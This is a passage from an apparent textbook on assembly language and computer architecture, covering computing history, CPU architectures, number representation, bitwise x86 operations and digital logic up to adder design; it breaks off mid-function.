Advanced Assembly Language Programming & Computer Architecture

From Fundamentals to Reverse Engineering and Systems Development

PART I — Foundations of Computer Systems

Chapter 1: Introduction to Computer Architecture

1.1 History of Computing Systems

The evolution of computing systems represents one of humanity's most remarkable technological journeys. From mechanical calculating devices to modern quantum computers, this history provides essential context for understanding why assembly language programming remains relevant today.

The Pre-Electronic Era (Pre-1940s)

The earliest computing devices were mechanical. Charles Babbage's Analytical Engine (designed in 1837, never completed) anticipated the fundamental elements of a modern computer: a store (memory), a mill (CPU), and punched cards for input/output. Ada Lovelace wrote algorithms for this machine and is often regarded as the world's first programmer. Herman Hollerith's tabulating machine (1890) used punched cards for the US Census; his company later merged into the firm that became IBM.

First Generation: Vacuum Tubes (1940-1956)

The Electronic Numerical Integrator and Computer (ENIAC), completed in 1945, represented a major leap. With 17,468 vacuum tubes, it could perform 5,000 additions per second, which was revolutionary for its time. However, programming it initially required physically rewiring the machine. The Manchester Baby (1948) was the first electronic stored-program computer to run a program, implementing the Von Neumann architecture we still use today. UNIVAC I (1951) was the first commercial computer produced in the United States; it famously predicted Eisenhower's 1952 election victory from early returns.

Second Generation: Transistors (1956-1963)

The transistor's invention at Bell Labs (1947) transformed computing. Transistors were smaller, more reliable, and generated less heat than vacuum tubes. IBM introduced the 1401 and 7090 mainframes. The first high-level languages emerged—FORTRAN (1957) and COBOL (1959). Assembly language became essential as programmers needed to interface between these new languages and the underlying hardware.

Third Generation: Integrated Circuits (1964-1971)

Jack Kilby and Robert Noyce independently invented the integrated circuit, allowing multiple transistors on a single chip. IBM's System/360 (1964) introduced the concept of a compatible family of computers, all sharing the same instruction set architecture—a principle that would later define x86 compatibility. The PDP-8 (1965) became the first successful minicomputer, priced at an accessible $18,000.

Fourth Generation: Microprocessors (1971-Present)

Intel's 4004 (1971), the first commercial microprocessor, contained 2,300 transistors and ran at 740 kHz. The 8080 (1974) powered the Altair 8800, sparking the personal computer revolution. The 8086 (1978) introduced the x86 architecture that dominates desktop computing to this day. Each subsequent generation (286, 386, 486, Pentium, Core) added features while maintaining backward compatibility.

The Modern Era

Today's processors contain billions of transistors. Apple's M1 (2020) demonstrates the power of system-on-chip design, integrating CPU, GPU, memory, and specialized accelerators. Yet the fundamental concepts remain—instructions execute, data moves, and assembly language provides the closest view of this process.

1.2 Von Neumann Architecture

John von Neumann's 1945 report "First Draft of a Report on the EDVAC" described an architecture that became the foundation of virtually all general-purpose computers.

Core Components

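The Von Neumann architecture is usually described in terms of four main subsystems:

Arithmetic Logic Unit (ALU): Performs arithmetic and logical operations
Control Unit: Fetches and decodes instructions and coordinates operations
Memory Unit: Stores both instructions and data
Input/Output System: Communicates with external devices

In modern terminology, the ALU and the Control Unit together form the Central Processing Unit (CPU).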

The Stored-Program Concept

The revolutionary insight was storing both program instructions and data in the same memory space. This allowed:

Self-modifying code (common in early assembly programming)
Programs to be treated as data (enabling compilers and assemblers)
Easy loading of new programs into memory

The Fetch-Decode-Execute Cycle

The Von Neumann architecture operates through a continuous cycle:

Fetch: The CPU retrieves an instruction from memory at the address stored in the Program Counter (PC)
Decode: The Control Unit interprets the instruction
Execute: The ALU or other components perform the required operation
Store: Results are written back to memory or registers
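
The cycle above can be sketched as a toy stored-program machine. This is an illustrative model only: the four opcodes (LOAD, ADD, STORE, HALT), the two-cell instruction format, and the single accumulator are assumptions made for the example and do not correspond to any real instruction set.

```python
# Toy stored-program machine: instructions and data share one memory list.
# The opcodes and the two-cell instruction format are invented for this sketch.
LOAD, ADD, STORE, HALT = 1, 2, 3, 0

def run(memory):
    pc = 0    # Program Counter
    acc = 0   # single accumulator register
    while True:
        opcode, operand = memory[pc], memory[pc + 1]   # Fetch
        pc += 2
        if opcode == LOAD:                             # Decode, then Execute
            acc = memory[operand]
        elif opcode == ADD:
            acc = (acc + memory[operand]) & 0xFF       # 8-bit accumulator
        elif opcode == STORE:
            memory[operand] = acc                      # Store (write-back)
        elif opcode == HALT:
            return memory
        else:
            raise ValueError(f"unknown opcode {opcode} at address {pc - 2}")

# Code occupies addresses 0-7; data lives at addresses 8-10 of the same memory.
program = [LOAD, 8, ADD, 9, STORE, 10, HALT, 0, 40, 2, 0]
result = run(list(program))
print(result[10])   # prints 42
```

Because code and data sit in the same list, a STORE aimed at addresses 0-7 would overwrite instructions, which is the self-modifying behavior the stored-program concept permits.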

The Von Neumann Bottleneck

The shared bus between CPU and memory creates a fundamental limitation—the "Von Neumann bottleneck." Since instructions and data share the same pathway, throughput is limited by bus bandwidth. This constraint has driven many architectural innovations:

Cache memories (storing frequently used data closer to CPU)
Harvard architecture (separate instruction and data paths)
Superscalar execution (fetching multiple instructions simultaneously)

1.3 Harvard Architecture

The Harvard Mark I, completed in 1944, used physically separate memory for instructions and data. This design offers distinct advantages:

Characteristics

Separate address spaces for instructions and data
Dedicated buses for each memory type
Simultaneous access to instructions and data

Advantages

No Von Neumann bottleneck for instruction fetch
Security benefits (preventing code modification)
Deterministic timing (critical for embedded systems)

Disadvantages

More complex hardware
Wasted memory if spaces are unbalanced
Cannot load new programs easily

1.4 Modified Harvard Architecture

Modern processors typically implement a modified Harvard architecture, which combines features of both designs:

Separate L1 caches for instructions and data
Unified memory at higher levels (L2/L3 cache, main memory)
Special instructions for accessing code as data

This approach gives the performance benefits of Harvard at the cache level while maintaining the flexibility of Von Neumann for main memory. Most ARM Cortex-M processors use modified Harvard, as do x86 processors at the cache level.

1.5 CISC vs RISC

The philosophical divide between Complex Instruction Set Computer (CISC) and Reduced Instruction Set Computer (RISC) architecture has shaped processor design for decades.

CISC Characteristics (x86, 68000)

CISC emerged when memory was expensive and compilers were primitive. Key features include:

Variable instruction length: Instructions can be 1-15 bytes on x86
Complex instructions: Single instructions perform multi-step operations (e.g., REP MOVSB copies entire strings)
Memory-operand instructions: Operations can work directly on memory
Fewer registers: Historical constraints limited register count
Microcode: Complex instructions are implemented as microcode routines

Advantages of CISC:

Dense code (important when memory was expensive)
Backward compatibility (x86 maintains 40+ years of compatibility)
Simpler compilers (instructions map directly to high-level constructs)

RISC Characteristics (ARM, RISC-V, MIPS)

RISC emerged from research at IBM, Stanford, and UC Berkeley in the late 1970s and early 1980s, emphasizing simplicity and regularity:

Fixed instruction length: Typically 32 bits
Simple instructions: Each instruction does one thing
Load-store architecture: Only load/store access memory
Many registers: Often 32 general-purpose registers (16 on 32-bit ARM)
Hardwired control: No microcode, faster decoding

Advantages of RISC:

Simpler pipeline design
Easier to achieve high clock speeds
More efficient compiler optimization
Lower power consumption

The Modern Convergence

Modern x86 processors internally decode CISC instructions into RISC-like micro-ops and execute those on an out-of-order core. ARM added the Thumb and Thumb-2 instruction sets for denser code. The distinction has blurred, but understanding both remains valuable for assembly programmers.

1.6 Modern CPU Overview

A modern CPU represents an astonishing feat of engineering, containing billions of transistors operating at gigahertz frequencies. Understanding its components helps assembly programmers write better code.

Core Components

Arithmetic Logic Unit (ALU): Performs arithmetic and logical operations
- Integer arithmetic (ADD, SUB, MUL, DIV)
- Bitwise operations (AND, OR, XOR, NOT)
- Shift and rotate operations
Floating Point Unit (FPU): Handles floating-point calculations
- IEEE 754 compliance
- SIMD/vector extensions for parallel floating-point
Control Unit: Coordinates instruction execution
- Instruction fetch and decode
- Branch prediction
- Exception handling
Cache Hierarchy: Multi-level memory caching
- L1: Fastest, smallest (32KB typical), split instruction/data
- L2: Larger (256KB-1MB), unified
- L3: Shared among cores (several MB)
- L4: Optional, eDRAM or similar
Memory Management Unit (MMU): Handles virtual-to-physical address translation
- Page table walking
- TLB (Translation Lookaside Buffer) caching
Register File: Fastest storage, directly accessible
- General-purpose registers
- Control/status registers
- Vector registers (for SIMD)

Superscalar Components

Modern processors can execute multiple instructions per cycle:

Multiple execution units: Several ALUs, FPUs, load/store units
Out-of-order execution: Reorder instructions for better throughput
Register renaming: Eliminate false dependencies
Speculative execution: Execute instructions past a branch before the branch is resolved

1.7 Role of Assembly in Modern Systems

With high-level languages dominating modern development, one might question assembly's relevance. However, assembly language programming remains crucial for several domains:

Performance-Critical Code

Game engines: Graphics routines, physics calculations
Encryption/decryption: AES, SHA implementations
Signal processing: Audio/video codecs, DSP algorithms
HPC applications: Mathematical libraries (BLAS, LAPACK)

System Programming

Operating systems: Context switching, interrupt handlers, memory management
Device drivers: Direct hardware interaction, MMIO
Bootloaders: Initial system startup before C runtime available
Hypervisors/VMMs: Virtual machine management

Reverse Engineering and Security

Malware analysis: Understanding malicious code behavior
Vulnerability research: Finding and exploiting bugs
Binary patching: Modifying compiled programs
Digital rights management: Bypassing protection mechanisms

Embedded Systems

Microcontrollers: Small devices with limited resources
Firmware: BIOS/UEFI, router firmware, IoT devices
Real-time systems: Guaranteed timing constraints

Compiler Development

Code generation: Understanding target architecture
Optimization: Recognizing pattern opportunities
Debugging: Analyzing compiler output

Education and Understanding

Computer architecture: Deep understanding of how computers work
Debugging skills: Reading disassembled code when debugging
Security awareness: Understanding exploitation techniques

When Assembly Is Appropriate

When performance is absolutely critical
When hardware access is required
When no compiler exists for the target
When reverse engineering existing code
When size constraints are extreme (boot sectors)

When Assembly Is Not Appropriate

Most application development
When portability matters
When development speed is priority
When maintenance cost must be minimized

Chapter 2: Number Systems & Data Representation

2.1 Binary, Octal, Decimal, Hexadecimal

Understanding number systems is fundamental to assembly programming, as computers ultimately work with binary representations.

Binary (Base-2)

Computers use binary because transistors have two stable states: on (1) and off (0). Each binary digit (bit) represents a power of 2:

Binary: 10110110
Value:  1×2⁷ + 0×2⁶ + 1×2⁵ + 1×2⁴ + 0×2³ + 1×2² + 1×2¹ + 0×2⁰
       = 128 + 0 + 32 + 16 + 0 + 4 + 2 + 0
       = 182 decimal

Common bit groupings:

Nibble: 4 bits (one hex digit)
Byte: 8 bits (fundamental addressable unit)
Word: 16 bits (historical x86 word size)
DWORD: 32 bits (double word)
QWORD: 64 bits (quad word)

Octal (Base-8)

Octal was popular in early computing (PDP-8, UNIX permissions) because 3 bits group neatly:

Octal: 266
Binary: 010 110 110 (3 bits per digit)
Value:  2×8² + 6×8¹ + 6×8⁰ = 128 + 48 + 6 = 182 decimal

Decimal (Base-10)

Human-familiar system but problematic for computers because:

10 is not a power of 2
Some decimal fractions have non-terminating binary representations (e.g., 0.1)
Binary-coded decimal (BCD) was developed to address this

Hexadecimal (Base-16)

The most common system in assembly programming because 4 bits fit perfectly:

Hex: B6
Binary: 1011 0110
Value:  B×16¹ + 6×16⁰ = 11×16 + 6 = 176 + 6 = 182 decimal

Conversion Between Bases

Converting between binary and hex is straightforward due to the 4-bit grouping:

Binary:  1011 0110 1111 0001
         B    6    F    1
Hex:     B6F1

Converting decimal to binary involves repeated division:

182 ÷ 2 = 91 remainder 0 (LSB)
91 ÷ 2 = 45 remainder 1
45 ÷ 2 = 22 remainder 1
22 ÷ 2 = 11 remainder 0
11 ÷ 2 = 5 remainder 1
5 ÷ 2 = 2 remainder 1
2 ÷ 2 = 1 remainder 0
1 ÷ 2 = 0 remainder 1 (MSB)

Read remainders from bottom up: 10110110
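
The repeated-division procedure can be written as a short routine. This is a minimal sketch; the function name `to_binary` is chosen for illustration.

```python
def to_binary(value):
    """Convert a non-negative integer to a binary string by repeated division by 2."""
    if value < 0:
        raise ValueError("value must be non-negative")
    if value == 0:
        return "0"
    remainders = []
    while value > 0:
        value, remainder = divmod(value, 2)
        remainders.append(str(remainder))   # the first remainder is the LSB
    return "".join(reversed(remainders))    # read from the last remainder (MSB) down

print(to_binary(182))   # prints 10110110
```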

2.2 Signed & Unsigned Integers

The same binary pattern can represent different values depending on interpretation.

Unsigned Integers

All bits contribute to magnitude. Range for n bits: 0 to 2ⁿ-1

8-bit unsigned: 00000000 to 11111111 (0 to 255)
16-bit unsigned: 0 to 65535
32-bit unsigned: 0 to 4,294,967,295
64-bit unsigned: 0 to 18,446,744,073,709,551,615

Signed Magnitude

The simplest signed representation (rarely used):

MSB represents sign (0=positive, 1=negative)
Remaining bits represent magnitude
Problem: Two representations for zero (+0 and -0)

+42: 00101010
-42: 10101010

One's Complement

Negatives are bitwise NOT of positives:

Still has two zeros (+0=00000000, -0=11111111)
Arithmetic requires end-around carry
Used in some early computers (CDC 6600)

+42: 00101010
-42: 11010101

2.3 Two's Complement

The universal signed integer representation in modern computers. Negatives are formed by inverting all bits and adding 1.

Formation Rule:

-N = ~N + 1

Examples with 8 bits:

+42: 00101010
-42: 11010110 (invert: 11010101, add 1: 11010110)

+127: 01111111
-127: 10000001 (invert: 10000000, add 1: 10000001)
-128: 10000000 (most negative value; +128 does not fit in 8 signed bits, so -128 has no positive counterpart)

Advantages of Two's Complement:

Single representation for zero
Addition/subtraction same for signed/unsigned
Automatic modulo arithmetic
Symmetric range except for most negative value

Range: -2ⁿ⁻¹ to 2ⁿ⁻¹-1

8-bit: -128 to 127
16-bit: -32,768 to 32,767
32-bit: -2,147,483,648 to 2,147,483,647

Sign Extension

Extending a signed number to more bits preserves value:

8-bit -42: 11010110
16-bit -42: 11111111 11010110 (copy sign bit to new high bits)
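
The encoding, decoding, and sign-extension rules can be checked with a few helper functions. This is a sketch; the function names are hypothetical, and Python's unbounded integers are masked to model fixed-width registers.

```python
def to_twos_complement(value, bits):
    """Return the unsigned bit pattern that encodes a signed value in `bits` bits."""
    lo, hi = -(1 << (bits - 1)), (1 << (bits - 1)) - 1
    if not lo <= value <= hi:
        raise OverflowError(f"{value} does not fit in {bits} bits")
    return value & ((1 << bits) - 1)

def from_twos_complement(pattern, bits):
    """Interpret an unsigned bit pattern as a signed two's complement value."""
    sign_bit = 1 << (bits - 1)
    return (pattern ^ sign_bit) - sign_bit

def sign_extend(pattern, from_bits, to_bits):
    """Widen a pattern by copying its sign bit into the new high bits."""
    return to_twos_complement(from_twos_complement(pattern, from_bits), to_bits)

print(format(to_twos_complement(-42, 8), "08b"))        # 11010110
print(format(sign_extend(0b11010110, 8, 16), "016b"))   # 1111111111010110
print(from_twos_complement(0b10000000, 8))              # -128
```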

2.4 Floating Point (IEEE 754)

Real numbers require floating-point representation. IEEE 754 is the universal standard.

Scientific Notation Review

Decimal scientific notation: 1.234 × 10³ = 1234
Binary scientific notation: 1.011₂ × 2³ = 1011₂ = 11₁₀

IEEE 754 Single Precision (32-bit)

Bits: SEEEEEEE EMMMMMMM MMMMMMMM MMMMMMMM
Where:
S = Sign bit (1 bit)
E = Exponent (8 bits)
M = Mantissa/Significand (23 bits)

Components:

Sign bit: 0 for positive, 1 for negative
Biased exponent: Actual exponent + 127 bias
Normalized mantissa: Leading 1 is implicit (except special cases)

Value Formula:

(-1)ˢ × 1.M × 2⁽ᴱ⁻¹²⁷⁾

Special Values:

Zero: E=0, M=0 (±0 exists)
Denormalized: E=0, M≠0 (gradual underflow)
Infinity: E=255, M=0 (±∞)
NaN: E=255, M≠0 (Not a Number)

Example: Representing 42.0

Convert to binary: 42 = 32 + 8 + 2 = 101010₂
Normalize: 101010 = 1.01010 × 2⁵
Bias exponent: 5 + 127 = 132 = 10000100₂
Mantissa: 01010 (implicit leading 1)
Sign: 0 (positive)

Result: 0 10000100 01010000000000000000000
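
The worked example can be verified by packing a value as a single-precision float and splitting the resulting 32 bits into fields. This sketch uses Python's standard `struct` module; the function name `float32_fields` is chosen for illustration.

```python
import struct

def float32_fields(x):
    """Round x to single precision and return (sign, biased exponent, mantissa)."""
    (bits,) = struct.unpack(">I", struct.pack(">f", x))
    sign = bits >> 31
    exponent = (bits >> 23) & 0xFF
    mantissa = bits & 0x7FFFFF
    return sign, exponent, mantissa

sign, exponent, mantissa = float32_fields(42.0)
print(sign, format(exponent, "08b"), format(mantissa, "023b"))

# Rebuild the value from the fields using the normalized-number formula.
value = (-1) ** sign * (1 + mantissa / 2**23) * 2 ** (exponent - 127)
print(value)
```

The reconstruction line applies only to normalized numbers; zero, denormalized values, infinity, and NaN need the special cases listed earlier.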

Double Precision (64-bit)

Sign: 1 bit
Exponent: 11 bits (bias 1023)
Mantissa: 52 bits
Range: approximately ±2.2×10⁻³⁰⁸ to ±1.8×10³⁰⁸ (normalized values)

Precision Limitations

Floating-point numbers are approximations:

0.1 in binary is repeating: 0.0001100110011...
Some operations lose precision
Comparison requires epsilon tolerance
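
A short experiment shows why exact comparison is unreliable. Python floats are IEEE 754 doubles, and `math.isclose` from the standard library compares with a relative tolerance.

```python
import math

total = 0.1 + 0.2
print(total == 0.3)               # exact comparison: False
print(math.isclose(total, 0.3))   # comparison with a tolerance: True
```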

2.5 Endianness

Endianness describes byte ordering in multi-byte values.

Big-Endian

Most significant byte stored at lowest address (network byte order):

Memory address:   [0]  [1]  [2]  [3]
Value 0x12345678: 0x12 0x34 0x56 0x78

Used by: network protocols, PowerPC, SPARC, 68000

Little-Endian

Least significant byte stored at lowest address:

Memory address:   [0]  [1]  [2]  [3]
Value 0x12345678: 0x78 0x56 0x34 0x12

Used by: x86, x86-64, most ARM systems

Bi-Endian

Some architectures (ARM, MIPS) can switch endianness.

Implications for Assembly Programmers

Multi-byte values read/written differently
Network data requires byte swapping
Type punning through unions/pointers affected
Debugger memory dumps show reversed bytes on little-endian

Example in x86 Assembly:

; Storing 0x12345678 to memory
mov eax, 0x12345678
mov [mem], eax

; Memory now contains: 78 56 34 12
; To read as network order, need:
bswap eax  ; byte swap instruction
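
The two byte layouts can be reproduced on any host with Python's standard `struct` module. The helper `bswap32` is a hypothetical name that models what the BSWAP instruction does to a 32-bit register.

```python
import struct

value = 0x12345678
little = struct.pack("<I", value)   # layout an x86 store produces
big = struct.pack(">I", value)      # network byte order
print(little.hex(" "), "|", big.hex(" "))

def bswap32(x):
    """Reverse the four bytes of a 32-bit value, like the x86 BSWAP instruction."""
    return int.from_bytes(x.to_bytes(4, "little"), "big")

print(hex(bswap32(value)))
```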

2.6 Character Encoding (ASCII, UTF-8, UTF-16)

ASCII (American Standard Code for Information Interchange)

7-bit encoding (0-127) covering English letters, digits, punctuation, and control characters:

0x41: 'A'
0x61: 'a'
0x30: '0'
0x20: Space
0x0D: Carriage Return
0x0A: Line Feed

Extended ASCII (8-bit) added characters 128-255, but varies by code page.

Unicode

Universal character set supporting all world scripts. Several encoding forms:

UTF-8

Variable-length: 1-4 bytes per character
ASCII characters use 1 byte (compatible with ASCII)
Self-synchronizing (can find character boundaries)
Dominant on web (over 95% of pages)

Encoding pattern:

0xxxxxxx                    (ASCII, 0-127)
110xxxxx 10xxxxxx            (2 bytes, 128-2047)
1110xxxx 10xxxxxx 10xxxxxx   (3 bytes, 2048-65535)
11110xxx 10xxxxxx 10xxxxxx 10xxxxxx (4 bytes, 65536+)
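
The bit patterns above translate directly into shifts and masks. The following sketch encodes one code point by hand; `utf8_encode` is an illustrative name, and in practice Python's built-in `str.encode("utf-8")` does the same job.

```python
def utf8_encode(code_point):
    """Encode one Unicode code point using the UTF-8 bit patterns."""
    if 0xD800 <= code_point <= 0xDFFF or not 0 <= code_point <= 0x10FFFF:
        raise ValueError("not a valid Unicode scalar value")
    if code_point < 0x80:                       # 0xxxxxxx
        return bytes([code_point])
    if code_point < 0x800:                      # 110xxxxx 10xxxxxx
        return bytes([0xC0 | (code_point >> 6),
                      0x80 | (code_point & 0x3F)])
    if code_point < 0x10000:                    # 1110xxxx 10xxxxxx 10xxxxxx
        return bytes([0xE0 | (code_point >> 12),
                      0x80 | ((code_point >> 6) & 0x3F),
                      0x80 | (code_point & 0x3F)])
    return bytes([0xF0 | (code_point >> 18),    # 11110xxx and three continuation bytes
                  0x80 | ((code_point >> 12) & 0x3F),
                  0x80 | ((code_point >> 6) & 0x3F),
                  0x80 | (code_point & 0x3F)])

for cp in (0x41, 0xE9, 0x20AC, 0x1F600):
    print(f"U+{cp:04X}", utf8_encode(cp).hex(" "))
```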

UTF-16

Variable-length: 2 or 4 bytes
Most common characters use 2 bytes
Used internally by Windows, Java, .NET
Surrogate pairs for characters beyond 65535

UTF-32

Fixed 4-byte characters
Simple but inefficient
Rarely used except internally

2.7 Bitwise Operations & Logic

Bitwise operations are fundamental to assembly programming.

AND (&)

Truth table: 1&1=1, 1&0=0, 0&1=0, 0&0=0
Use: Masking bits, clearing bits

and eax, 0x0F   ; keep only low 4 bits
and eax, ebx    ; bitwise AND

OR (|)

Truth table: 1|1=1, 1|0=1, 0|1=1, 0|0=0
Use: Setting bits

or eax, 0x80    ; set bit 7
or eax, ebx     ; bitwise OR

XOR (^)

Truth table: 1^1=0, 1^0=1, 0^1=1, 0^0=0
Use: Toggling bits, clearing registers

xor eax, eax    ; zero register (shorter encoding than mov eax, 0)
xor eax, 0xFF   ; toggle low 8 bits

NOT (~)

Truth table: ~1=0, ~0=1
Use: Bitwise complement

not eax         ; invert all bits

Common Bit Manipulations

Test if bit n is set:

test eax, 1<<n  ; AND without storing result
jnz bit_set

Set bit n:

or eax, 1<<n

Clear bit n:

and eax, ~(1<<n)

Toggle bit n:

xor eax, 1<<n

Extract bit field:

; Extract bits 8-15 into low byte
mov ebx, eax
shr ebx, 8
and ebx, 0xFF

Combine bit fields:

; Replace bits 8-15 of EAX with bits 8-15 of EBX (modifies EBX)
and eax, 0xFFFF00FF   ; clear bits 8-15
and ebx, 0x0000FF00   ; isolate bits 8-15 of bx
or eax, ebx           ; combine
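
The same manipulations can be modeled in a high-level language to check masks before committing them to assembly. In this sketch the function names are hypothetical, and results are masked to 32 bits to mimic a register such as EAX.

```python
MASK32 = 0xFFFFFFFF   # keep results within a 32-bit register width

def bit_is_set(x, n):
    return (x >> n) & 1 == 1

def set_bit(x, n):
    return (x | (1 << n)) & MASK32

def clear_bit(x, n):
    return x & ~(1 << n) & MASK32

def toggle_bit(x, n):
    return (x ^ (1 << n)) & MASK32

def extract_field(x, low, width):
    """Return `width` bits of x starting at bit `low`, shifted down to bit 0."""
    return (x >> low) & ((1 << width) - 1)

def insert_field(x, low, width, field):
    """Replace `width` bits of x starting at bit `low` with `field`."""
    mask = ((1 << width) - 1) << low
    return (x & ~mask & MASK32) | ((field << low) & mask)

print(hex(extract_field(0x12345678, 8, 8)))        # bits 8-15
print(hex(insert_field(0x12345678, 8, 8, 0xAB)))   # overwrite bits 8-15
```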

Bitwise Tricks

Swap without temporary:

xor eax, ebx
xor ebx, eax
xor eax, ebx

Check power of two:

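lea ecx, [eax-1]      ; ECX = EAX - 1 (TEST cannot take an expression as an operand)
test eax, ecx         ; EAX AND (EAX - 1), result discarded
jz power_of_two       ; zero if EAX is a power of two (EAX = 0 also gives zero; check it separately)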

Count set bits (population count):

; Modern x86 has POPCNT instruction
popcnt eax, eax
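
The reasoning behind these tricks is easier to follow in a high-level model. This sketch uses illustrative function names; `popcount` here is a software loop, not the POPCNT instruction.

```python
def is_power_of_two(x):
    """True when exactly one bit is set; x & (x - 1) clears the lowest set bit."""
    return x != 0 and (x & (x - 1)) == 0

def popcount(x):
    """Count set bits by clearing the lowest set bit until none remain."""
    count = 0
    while x:
        x &= x - 1
        count += 1
    return count

def xor_swap(a, b):
    """Swap two integers with three XORs and no temporary."""
    a ^= b
    b ^= a
    a ^= b
    return a, b

print(is_power_of_two(64), is_power_of_two(0), popcount(0b10110110), xor_swap(3, 5))
```

Note that in assembly the XOR swap zeroes the value if both operands are the same register or memory location; the model above takes two separate values, so that case does not arise.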

Chapter 3: Digital Logic Fundamentals

3.1 Logic Gates

Logic gates are the building blocks of digital circuits. Understanding them helps assembly programmers appreciate what's happening at the lowest level.

Basic Gates

AND Gate

Output HIGH only when ALL inputs HIGH
Symbol: D-shaped symbol
Truth table (2-input):

A	B	Q
0	0	0
0	1	0
1	0	0
1	1	1

OR Gate

Output HIGH when ANY input HIGH
Symbol: Curved input, pointed output
Truth table:

A	B	Q
0	0	0
0	1	1
1	0	1
1	1	1

NOT Gate (Inverter)

Output opposite of input
Symbol: Triangle with bubble
Truth table:

A	Q
0	1
1	0

NAND Gate

AND followed by NOT
Universal gate (can build any circuit)
Symbol: AND with bubble

NOR Gate

OR followed by NOT
Also universal

XOR Gate

Output HIGH when inputs differ
Symbol: OR with additional line
Truth table:

A	B	Q
0	0	0
0	1	1
1	0	1
1	1	0

XNOR Gate

Output HIGH when inputs same
XOR followed by NOT

Gate Delay

Real gates have propagation delay (typically picoseconds to nanoseconds), which affects maximum clock speed and can cause race conditions.

3.2 Boolean Algebra

Boolean algebra provides mathematical tools for analyzing and simplifying digital circuits.

Laws and Identities

Identity Laws:

A + 0 = A
A · 1 = A

Null (Domination) Laws:

A + 1 = 1
A · 0 = 0

Idempotent Laws:

A + A = A
A · A = A

Complement Laws:

A + A' = 1
A · A' = 0

Involution Law:

(A')' = A

Commutative Laws:

A + B = B + A
A · B = B · A

Associative Laws:

(A + B) + C = A + (B + C)
(A · B) · C = A · (B · C)

Distributive Laws:

A · (B + C) = A·B + A·C
A + (B·C) = (A+B) · (A+C)

DeMorgan's Theorems:

(A + B)' = A' · B'
(A · B)' = A' + B'

Karnaugh Maps

Graphical method for simplifying Boolean expressions with up to 6 variables:

2-variable K-map:
     B
     0   1
A 0 |   |
  1 |   |

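Example: Simplify A'B + AB'

The K-map has 1s only in the two diagonal cells (A=0, B=1 and A=1, B=0). Diagonal cells are not adjacent, so no grouping is possible: the expression is already minimal and is exactly A XOR B.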
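
With so few variables, Boolean identities can be confirmed by brute force over every input combination. The sketch below checks several laws from this section and the A'B + AB' example; the dictionary keys are just labels chosen for the example.

```python
from itertools import product

def NOT(a):
    return 1 - a

# Each entry maps a label to a predicate over three one-bit inputs.
laws = {
    "De Morgan (OR)":  lambda a, b, c: NOT(a | b) == (NOT(a) & NOT(b)),
    "De Morgan (AND)": lambda a, b, c: NOT(a & b) == (NOT(a) | NOT(b)),
    "Distributive 1":  lambda a, b, c: (a & (b | c)) == ((a & b) | (a & c)),
    "Distributive 2":  lambda a, b, c: (a | (b & c)) == ((a | b) & (a | c)),
    "A'B + AB' = XOR": lambda a, b, c: ((NOT(a) & b) | (a & NOT(b))) == (a ^ b),
}

for name, law in laws.items():
    holds = all(law(a, b, c) for a, b, c in product((0, 1), repeat=3))
    print(f"{name}: {holds}")
```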

3.3 Flip-Flops & Registers

Flip-flops are sequential logic elements that store state.

SR Latch (Set-Reset)

Basic bistable element:

S=1, R=0: Set Q=1
S=0, R=1: Reset Q=0
S=0, R=0: Hold state
S=1, R=1: Invalid (race condition)

D Flip-Flop

Data flip-flop captures input on clock edge:

Truth table (positive edge-triggered):
Clock  D  Q(next)
  ↑    0   0
  ↑    1   1
  otherwise Q unchanged

JK Flip-Flop

More versatile, eliminates invalid state:

J=1, K=0: Set
J=0, K=1: Reset
J=1, K=1: Toggle
J=0, K=0: Hold
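
The JK behavior table can be modeled as a small class whose state changes only when a clock edge is applied. This is a behavioral sketch with hypothetical names; it ignores setup/hold timing and propagation delay.

```python
class JKFlipFlop:
    """Behavioral model: the stored bit changes only when clock_edge() is called."""

    def __init__(self):
        self.q = 0

    def clock_edge(self, j, k):
        if j and k:
            self.q ^= 1   # toggle
        elif j:
            self.q = 1    # set
        elif k:
            self.q = 0    # reset
        return self.q     # J=0, K=0 falls through: hold

ff = JKFlipFlop()
inputs = [(1, 0), (0, 0), (1, 1), (1, 1), (0, 1)]
outputs = [ff.clock_edge(j, k) for j, k in inputs]
print(outputs)   # [1, 1, 0, 1, 0]
```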

Registers

Multiple D flip-flops sharing common clock form a register:

8-bit register:
        D0 D1 D2 D3 D4 D5 D6 D7
        |  |  |  |  |  |  |  |
Clock---|--|--|--|--|--|--|--|--
        Q0 Q1 Q2 Q3 Q4 Q5 Q6 Q7

Register Transfer Level (RTL)

Registers connected by combinational logic form the basis of CPU design. Assembly instructions correspond to RTL operations:

mov eax, ebx    ; RTL: EAX ← EBX
add eax, ecx    ; RTL: EAX ← EAX + ECX

3.4 Adders & ALUs

Half Adder

Adds two bits, produces sum and carry:

Sum = A XOR B
Carry = A AND B

Truth table:
A B | Sum Carry
0 0 | 0   0
0 1 | 1   0
1 0 | 1   0
1 1 | 0   1

Full Adder

Adds three bits (two inputs plus carry-in):

Sum = (A XOR B) XOR Cin
Cout = (A AND B) OR (Cin AND (A XOR B))

Truth table:
A B Cin | Sum Cout
0 0 0   | 0   0
0 0 1   | 1   0
0 1 0   | 1   0
0 1 1   | 0   1
1 0 0   | 1   0
1 0 1   | 0   1
1 1 0   | 0   1
1 1 1   | 1   1

Ripple-Carry Adder

Chain full adders for multi-bit addition:

      A3 B3    A2 B2    A1 B1    A0 B0
      |  |     |  |     |  |     |  |
Cout--FA3------FA2------FA1------FA0--Cin
       |        |        |        |
       S3       S2       S1       S0
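
The chain can be simulated by applying the full-adder equations one bit at a time and handing each carry to the next stage. This is a sketch with illustrative function names and a default width of 4 bits to match the diagram.

```python
def full_adder(a, b, cin):
    """One-bit full adder built from the XOR/AND/OR equations."""
    partial = a ^ b
    return partial ^ cin, (a & b) | (cin & partial)   # (sum, carry-out)

def ripple_carry_add(a, b, width=4, cin=0):
    """Add two unsigned integers bit by bit, passing the carry along the chain."""
    result, carry = 0, cin
    for i in range(width):                            # bit 0 (FA0) first
        s, carry = full_adder((a >> i) & 1, (b >> i) & 1, carry)
        result |= s << i
    return result, carry                              # carry is Cout of the last stage

print(ripple_carry_add(0b1011, 0b0110))   # 11 + 6 = 17: sum bits 0001, Cout 1
```

The loop makes the drawback visible: stage i cannot finish until stage i-1 has produced its carry, so delay grows linearly with the width.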

Carry Look-Ahead Adder

Faster than ripple-carry by precomputing carries:

Generate: Gi = Ai AND Bi
Propagate: Pi = Ai XOR Bi
Carry: Ci+1 = Gi OR (Pi AND Ci)
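
Expanding the carry recurrence shows why look-ahead is faster: every carry becomes a function of the generate and propagate signals and C0 alone, so hardware can compute all carries in parallel. The sketch below evaluates that expanded form; the function names are hypothetical, and a software loop naturally does not reproduce the parallelism.

```python
def lookahead_carries(a, b, width=4, c0=0):
    """Return ([C0..Cwidth], propagate bits) using generate/propagate signals."""
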